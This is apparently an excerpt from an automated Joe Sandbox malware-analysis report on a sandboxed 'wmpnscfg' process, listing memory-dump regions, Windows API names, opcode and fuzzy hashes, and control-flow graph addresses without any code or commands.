                                                                                                                • API ID: socket$ErrorModeclosesocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 2183620661-0
                                                                                                                • Opcode ID: 86a7dbef4beb537d1f960ef4159f5a72687c895cdfeef9c93758c5432ac85e68
                                                                                                                • Instruction ID: 48ce5b75c54cbb0624461a21264e691d6fdaa755fb314a0abe46e14d656ba8db
                                                                                                                • Opcode Fuzzy Hash: 86a7dbef4beb537d1f960ef4159f5a72687c895cdfeef9c93758c5432ac85e68
                                                                                                                • Instruction Fuzzy Hash: D341A73061CB498FE758EF28D86899A77E1FF98310F55862EE09BC32A1DF789544CB41

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: socket$ErrorModegetsockopt
                                                                                                                • String ID:
                                                                                                                • API String ID: 552242919-0
                                                                                                                • Opcode ID: f4e6771871a383ecd65cf7c786fccd009df30cb3b3764fe840cb75ff13171734
                                                                                                                • Instruction ID: b1aa109bb598c6daa78c06861b139157cb2b591602a54f0369680cd645bb3115
                                                                                                                • Opcode Fuzzy Hash: f4e6771871a383ecd65cf7c786fccd009df30cb3b3764fe840cb75ff13171734
                                                                                                                • Instruction Fuzzy Hash: 6041E370218B588FE758EF28F899B6AB7E1FB99300F51466DE54BC32A1DF389405CB41

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID: rE\
                                                                                                                • API String ID: 544645111-988334199
                                                                                                                • Opcode ID: 75d6d8eb26df1a839d51af674b3d6b425c3a8640e6788e6840d12e792dd5345f
                                                                                                                • Instruction ID: a76974b5057b1cfd78c1e160a95b9da45d5cea653eb98afae8fa6eae9cec5f26
                                                                                                                • Opcode Fuzzy Hash: 75d6d8eb26df1a839d51af674b3d6b425c3a8640e6788e6840d12e792dd5345f
                                                                                                                • Instruction Fuzzy Hash: 7E11943530891D4FEB55F758A8D6BB972DAF7D9300F401569AA0FC3286DE38C9454781

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseHandleMappingOpenView
                                                                                                                • String ID:
                                                                                                                • API String ID: 2553196624-0
                                                                                                                • Opcode ID: e5e44baeb6ac7a5ef2abf0622d7dcda60392d94986a7d3768f6014d184717f4c
                                                                                                                • Instruction ID: b35cef94779f7c073a1ffec34f7154d6c426c589157998ae122b9782e2863f7d
                                                                                                                • Opcode Fuzzy Hash: e5e44baeb6ac7a5ef2abf0622d7dcda60392d94986a7d3768f6014d184717f4c
                                                                                                                • Instruction Fuzzy Hash: DD31C63121892C4FDB65FF20E48A7FAB3E8FB58301F118569A94BC3196EA34D5048741

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID: P
                                                                                                                • API String ID: 716092398-3110715001
                                                                                                                • Opcode ID: cfa3f0b6778a70b443997505d324e50d054ac30842702c4c9102a20ff55eb27d
                                                                                                                • Instruction ID: 7399e254981e63e0930fd95c27c2d4b3f0d8d19f1bf43242574f7a290fbe38f0
                                                                                                                • Opcode Fuzzy Hash: cfa3f0b6778a70b443997505d324e50d054ac30842702c4c9102a20ff55eb27d
                                                                                                                • Instruction Fuzzy Hash: 71516370518B948FD765EF24D88A7AABBE4FB95311F10462EE48EC2290DF349445CF83

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 304 7df4df3e47b8-7df4df3e47f0 call 7df4df3e1478 307 7df4df3e4b0d-7df4df3e4b32 call 7df4df3e55b0 304->307 308 7df4df3e47f6-7df4df3e480e call 7df4df3e1538 304->308 308->307 313 7df4df3e4814-7df4df3e4845 call 7df4df3e1708 call 7df4df3e1740 call 7df4df3e1818 308->313 313->307 321 7df4df3e484b-7df4df3e485d 313->321 321->307 323 7df4df3e4863-7df4df3e4880 321->323 325 7df4df3e4958-7df4df3e4a0d call 7df4df3edb48 call 7df4df3e28d4 call 7df4df3edb72 call 7df4df3edb6c call 7df4df3edb66 SendMessageA 323->325 326 7df4df3e4886-7df4df3e48f6 call 7df4df3edb48 * 3 323->326 367 7df4df3e4a12-7df4df3e4a18 325->367 344 7df4df3e4953-7df4df3e4956 326->344 344->325 347 7df4df3e48f8-7df4df3e48fb 344->347 348 7df4df3e48fd-7df4df3e4901 347->348 349 7df4df3e4909-7df4df3e4921 calloc 347->349 348->349 351 7df4df3e4903-7df4df3e4907 348->351 352 7df4df3e4a7e 349->352 353 7df4df3e4927-7df4df3e4945 call 7df4df3e55d0 349->353 351->349 355 7df4df3e4950-7df4df3e4951 351->355 358 7df4df3e4a87-7df4df3e4a8a 352->358 363 7df4df3e4a5c-7df4df3e4a60 353->363 364 7df4df3e494b-7df4df3e494c 353->364 355->344 361 7df4df3e4a8c-7df4df3e4a8f 358->361 362 7df4df3e4af5-7df4df3e4af6 358->362 365 7df4df3e4a91-7df4df3e4ab4 call 7df4df3edb48 361->365 366 7df4df3e4ade 361->366 371 7df4df3e4afe-7df4df3e4b08 call 7df4df3e2730 362->371 368 7df4df3e4a62-7df4df3e4a66 363->368 369 7df4df3e4a6b-7df4df3e4a6f 363->369 370 7df4df3e494e 364->370 383 7df4df3e4abe-7df4df3e4ad6 call 7df4df3edb48 365->383 384 7df4df3e4ab6-7df4df3e4abc 365->384 374 7df4df3e4ae0-7df4df3e4af3 366->374 367->371 373 7df4df3e4a1e-7df4df3e4a24 367->373 368->370 369->370 375 7df4df3e4a75-7df4df3e4a79 369->375 370->355 371->307 373->371 378 7df4df3e4a2a-7df4df3e4a3e 373->378 374->358 374->362 375->370 378->371 385 7df4df3e4a44-7df4df3e4a57 call 7df4df3e55d0 378->385 383->366 384->366 385->374
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3498844093.00007DF4DF3E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF3E1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_7df4df3e1000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FunctionMessageProtectSendTableVirtualcalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2453823186-0
                                                                                                                • Opcode ID: f21b9ec484d8d2d9b9243406eb49c24197b694a35871426f8b048c7a46f2aacc
                                                                                                                • Instruction ID: 8a877635b1303d21cc49f12797e2f948259527733a6f8b38fa7b43fabd81f2bd
                                                                                                                • Opcode Fuzzy Hash: f21b9ec484d8d2d9b9243406eb49c24197b694a35871426f8b048c7a46f2aacc
                                                                                                                • Instruction Fuzzy Hash: 59B1563561CA888BDBA4EF24D88456B73F1FF98310F554B2BE04BC7192EE78E9458781

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3498125340.00007DF4DF3B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF3B1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_7df4df3b1000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FunctionMessageProtectSendTableVirtualcalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2453823186-0
                                                                                                                • Opcode ID: 9476529166d77aa32403f16abccb553efbe971cbc2abc63400368bf18a283a5f
                                                                                                                • Instruction ID: b8bdee556e681cb08ae882ca23a28fe0606cdb3dc6e3077b74bb04624ae386fe
                                                                                                                • Opcode Fuzzy Hash: 9476529166d77aa32403f16abccb553efbe971cbc2abc63400368bf18a283a5f
                                                                                                                • Instruction Fuzzy Hash: 9071623061CA888FDBA4EF18D8915AB73F1FF94710B55462BE44FCB196EE38E9118781

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 515 244654122d4-24465412303 GetSystemInfo 516 24465412305-24465412310 515->516 517 24465412313-24465412329 515->517 516->517 518 2446541232f-24465412332 517->518 519 24465412334-24465412337 518->519 520 2446541234e-24465412354 518->520 521 24465412349-2446541234c 519->521 522 24465412339-2446541233c 519->522 523 24465412356-24465412366 520->523 524 244654123cf-244654123d2 520->524 521->518 522->521 526 2446541233e-24465412343 522->526 527 24465412395-2446541239b 523->527 525 2446541245e 524->525 531 2446541246b-24465412482 525->531 532 24465412460-24465412463 525->532 526->521 528 244654124b1-244654124c3 526->528 529 24465412368-2446541237f 527->529 530 2446541239d 527->530 529->530 544 24465412381-24465412389 529->544 536 2446541239f-244654123a2 530->536 535 24465412484-2446541249e 531->535 533 244654123d7-244654123f5 532->533 534 24465412469 532->534 539 24465412437 533->539 540 244654123f7-2446541240e 533->540 534->528 535->535 538 244654124a0-244654124ab 535->538 536->524 537 244654123a4-244654123c4 VirtualAlloc 536->537 537->531 542 244654123ca-244654123cd 537->542 538->528 543 24465412439-2446541243c 539->543 540->539 548 24465412410-24465412418 540->548 542->523 542->524 543->528 546 2446541243e-2446541245c 543->546 544->536 547 2446541238b-24465412393 544->547 546->525 547->527 547->530 548->543 549 2446541241a-24465412435 548->549 549->539 549->540
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocInfoSystemVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 3440192736-0
                                                                                                                • Opcode ID: 97221a5a18e4aacc6e4870847a1657838270caee770a845de3dac3f068ae24cc
                                                                                                                • Instruction ID: 232878ad67f72e55522ceef8120973c049f4ffcbc762c4e8eb27adcabafcb686
                                                                                                                • Opcode Fuzzy Hash: 97221a5a18e4aacc6e4870847a1657838270caee770a845de3dac3f068ae24cc
                                                                                                                • Instruction Fuzzy Hash: A451B13021CE3D4FFB69FA6DA84D37A72D5F79A300F5501AAEA49C3195EE74C8818781

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseFileHandleViewmalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 4055022194-0
                                                                                                                • Opcode ID: 2545b146e03987401e8860446111752460087adb5538b97f3e49e3c2a2eae485
                                                                                                                • Instruction ID: 4d3cedbc954cc34d3fc48ebcee27ecc74e58999537471bbaa065a2a228ffe2c8
                                                                                                                • Opcode Fuzzy Hash: 2545b146e03987401e8860446111752460087adb5538b97f3e49e3c2a2eae485
                                                                                                                • Instruction Fuzzy Hash: 5D4187712149284FE755FF69E88ABB673D8FB96301F010559E90BC3192DF34D845CB81

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 71851ab31bd5e99a8088f9e241981b9a75f35149f95cf9a9c2613fb5189a6f34
                                                                                                                • Instruction ID: 90579222c457de317bfb5686c4080117de9164dbef802d460134bd90adbc1c77
                                                                                                                • Opcode Fuzzy Hash: 71851ab31bd5e99a8088f9e241981b9a75f35149f95cf9a9c2613fb5189a6f34
                                                                                                                • Instruction Fuzzy Hash: 3931272031CA544BEB20AB2CAC997653BC5EB5B310F560295ED9AC72C9CB6488028385
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3498125340.00007DF4DF3B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF3B1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_7df4df3b1000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 008c1c100189bfc35651791388f787f69f2d51d68de1c2a05aeaf1d2b03de7f2
                                                                                                                • Instruction ID: 62b7018a230a588aab19d13f20bf6d72b7510814b85d84014493f0b9b3f8397b
                                                                                                                • Opcode Fuzzy Hash: 008c1c100189bfc35651791388f787f69f2d51d68de1c2a05aeaf1d2b03de7f2
                                                                                                                • Instruction Fuzzy Hash: 1121E5315286C557DBA8AF2DDCA667BB3F5FF94320F19013BE44FCB186E668E8018245
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3499476686.00007DF4DF401000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF401000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_7df4df401000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
                                                                                                                • Instruction ID: ab86dd052a3b9b7663ea75a46090d42595dee8ea99fbf8b044a0122af4659288
                                                                                                                • Opcode Fuzzy Hash: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
                                                                                                                • Instruction Fuzzy Hash: 4521B4317086C557E7A89B689854676B3E1FFE4320F18413BEC4BC798AE678F8818255
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000003.3385880626.00007DF4DF3A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF3A1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_3_7df4df3a1000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
                                                                                                                • Instruction ID: 0144aa4db0dc98e7e16b57bc113ad33ace84ceb64d6224822a4de0b49b8a8ca6
                                                                                                                • Opcode Fuzzy Hash: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
                                                                                                                • Instruction Fuzzy Hash: F72107315089C557D7A8AF2ECC40576B3F5FF90360F19413BE44BCB9C5E668E8018A44
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3498844093.00007DF4DF3E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF3E1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_7df4df3e1000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 79a23d149b39818e3e43e8007e45963aa9a0f0bf87d1b18fa9329f731b042926
                                                                                                                • Instruction ID: f542b20e72a555c908a3e48ab71d24a9405f85e66b018f73e501fabb949580e0
                                                                                                                • Opcode Fuzzy Hash: 79a23d149b39818e3e43e8007e45963aa9a0f0bf87d1b18fa9329f731b042926
                                                                                                                • Instruction Fuzzy Hash: D221E7355086C557D7A8AB2CDC4467BB3F1FF94B20F19032BE44BCB186E678E851C245
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: callocfreemalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 4086611775-0
                                                                                                                • Opcode ID: 95e0b7105a60c66ccf3cf853b29ca3c02cf426d78340e81cc55da608d90ff99a
                                                                                                                • Instruction ID: 57945fbdc4892fc4d203b71c3b5c971fc9ae3d9786d7d48cf31687cd2187a95a
                                                                                                                • Opcode Fuzzy Hash: 95e0b7105a60c66ccf3cf853b29ca3c02cf426d78340e81cc55da608d90ff99a
                                                                                                                • Instruction Fuzzy Hash: 65916331518B684FD775FF24E88A7FAB3E5FB95300F010A6EE58AC3192DA34D9458782
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                                                                                                • Instruction ID: 932e3edb2feee242991a24f6709e3accb6862b24313c426cf34ea6bc38083c88
                                                                                                                • Opcode Fuzzy Hash: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                                                                                                • Instruction Fuzzy Hash: FAF09070210E0A4FFF95EB6D94D9F2533E8FB993A0F6212949D0ACA195DB32CC92C740
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: f573dec0403348014450f7ba306745c6dd418323538c19bace6ad6f3c15519fa
                                                                                                                • Instruction ID: 69936c799cdfb5006261f1866327479928c6c635338e043dfd4cda0858bd0c65
                                                                                                                • Opcode Fuzzy Hash: f573dec0403348014450f7ba306745c6dd418323538c19bace6ad6f3c15519fa
                                                                                                                • Instruction Fuzzy Hash: 3C710831208B248FE769FB18EC86B7573E5FB95310F11066DE98BC3591DA30E946C785
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000003.3385880626.00007DF4DF3A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF3A1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_3_7df4df3a1000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileMappingOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1680863896-0
                                                                                                                • Opcode ID: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
                                                                                                                • Instruction ID: 4a841ac75fb9c32899c271064f6cee97702e304569b711ed9eae7fdc3d52deb5
                                                                                                                • Opcode Fuzzy Hash: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
                                                                                                                • Instruction Fuzzy Hash: 9271407061C7884BD7B5EB2998857ABB7E1FF94310F054A2FE58FC2152EA34E5058B82
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 2340568224-0
                                                                                                                • Opcode ID: f5a0fb9eb97d8a0cea1a0077705b63a589f7aa8c555666e722ed38cdf1e7e3b3
                                                                                                                • Instruction ID: 312eea7cfb06a69b66cdf4f5cd75abba18248603dacca260b56d579932bf1b09
                                                                                                                • Opcode Fuzzy Hash: f5a0fb9eb97d8a0cea1a0077705b63a589f7aa8c555666e722ed38cdf1e7e3b3
                                                                                                                • Instruction Fuzzy Hash: FC41CB30314A380BEB69F738F89B7BA33DAEB95350F050699AD06C35D2DE34D9058742
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InformationVolume
                                                                                                                • String ID:
                                                                                                                • API String ID: 2039140958-0
                                                                                                                • Opcode ID: ab88d9938b3b72962f423333e66c75964dea025bf306d4a69d18b2f71a512dba
                                                                                                                • Instruction ID: bfe59dfc405120d2e8bc6ff2f2928fc514f16246b81af6312a66d0d6d1f0015a
                                                                                                                • Opcode Fuzzy Hash: ab88d9938b3b72962f423333e66c75964dea025bf306d4a69d18b2f71a512dba
                                                                                                                • Instruction Fuzzy Hash: 01417C7111C7588BE36AFB24E8897EBB3E4FB95300F014A5DA58AC3195EF749604CB82
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3498844093.00007DF4DF3E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF3E1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_7df4df3e1000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EventHook
                                                                                                                • String ID:
                                                                                                                • API String ID: 3661607649-0
                                                                                                                • Opcode ID: 5a2bbfa698742b6cae5652eefc388705153c62446812716ece3234e1382db74d
                                                                                                                • Instruction ID: d2fc9624cd7ddcc308f2aaa21c74e9fed000d23b37e3396aed5f9c2c56af866a
                                                                                                                • Opcode Fuzzy Hash: 5a2bbfa698742b6cae5652eefc388705153c62446812716ece3234e1382db74d
                                                                                                                • Instruction Fuzzy Hash: E0315231518A898FEBA4EB25C88556677B0FF55320F15073BD04FCA5D1EB38A885DB41
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: 692895d7e566b00515affad7a4510cba5330249c96600c383c0354dec883b266
                                                                                                                • Instruction ID: 9e4b167c7ac996f392232964527f66a5b9e91e366c95c18ec1ce072fb424799a
                                                                                                                • Opcode Fuzzy Hash: 692895d7e566b00515affad7a4510cba5330249c96600c383c0354dec883b266
                                                                                                                • Instruction Fuzzy Hash: BF018071204A4C8FDB45FF19E886AA9B3E9FBD9314F50462AE94AC2150EB34DA198781
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: eb8efb70a255d3993e3c222089937f44c28cf696e92b085bcc04ab88a5b55cd8
                                                                                                                • Instruction ID: 85f56aedafbc8385c9bed34da74183ff3ee0d50065a49fc425b0bf423da436d7
                                                                                                                • Opcode Fuzzy Hash: eb8efb70a255d3993e3c222089937f44c28cf696e92b085bcc04ab88a5b55cd8
                                                                                                                • Instruction Fuzzy Hash: 4001A23171892A8FEB64B76EEC8972533D5EB8B311B8540A5E80EC7154DA399841CB54
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3498125340.00007DF4DF3B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF3B1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_7df4df3b1000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EventHook
                                                                                                                • String ID:
                                                                                                                • API String ID: 3661607649-0
                                                                                                                • Opcode ID: 7e614b85896ac0b1141b176719915ed43944beda22e6c339024177dd55c03ccc
                                                                                                                • Instruction ID: 585fe8c8ddfdbaaa01889ed7453c2cbe42ed098b107679e2d888a6b7b54131ce
                                                                                                                • Opcode Fuzzy Hash: 7e614b85896ac0b1141b176719915ed43944beda22e6c339024177dd55c03ccc
                                                                                                                • Instruction Fuzzy Hash: 2611A13082CAD55AE7A8AB60CC6576772B0FF04324F550A3ED04BC90E1EB3CB095CA51
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: abc4bbe606b124008aec48ef764282d5b057ec30dc72963a0fbe36d295726b2e
                                                                                                                • Instruction ID: 3f7ddefffa10ab9ca8f62432a400989f9b78bce37eca8d00fd7d96a025d5d33e
                                                                                                                • Opcode Fuzzy Hash: abc4bbe606b124008aec48ef764282d5b057ec30dc72963a0fbe36d295726b2e
                                                                                                                • Instruction Fuzzy Hash: CF01F430214A6C0FFB45FB38E85E77A32DAEB59300F0185BAA44AC32D5DA38C8048B41
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 10892065-0
                                                                                                                • Opcode ID: 897fafeead847303cd79d11afed6f4c8d1267b1295cf91a495235683339b4e9f
                                                                                                                • Instruction ID: 53e000fb461e66fc3c30f087ec2f7e4d4d1a744717cceffd90a59e94a2f60d90
                                                                                                                • Opcode Fuzzy Hash: 897fafeead847303cd79d11afed6f4c8d1267b1295cf91a495235683339b4e9f
                                                                                                                • Instruction Fuzzy Hash: 0FF0E5A160CA3A4BFB74BFB77D8E3362259D387312F66497BDA05C7181DD3A88414200
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressCallerProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2663294120-0
                                                                                                                • Opcode ID: d995070f4c000868ee4da6d9934e01647bf6d928269a01321783332ab5c3360a
                                                                                                                • Instruction ID: 7b5874149ea683e8aa5cf7855833dc16212a868cdead8240426de5854646e81f
                                                                                                                • Opcode Fuzzy Hash: d995070f4c000868ee4da6d9934e01647bf6d928269a01321783332ab5c3360a
                                                                                                                • Instruction Fuzzy Hash: 15E0C211714C290BAB7871AE248D77751CAC7DC17271442BBE91DC3295EC60CC814390
                                                                                                                APIs
                                                                                                                Memory Dump Source
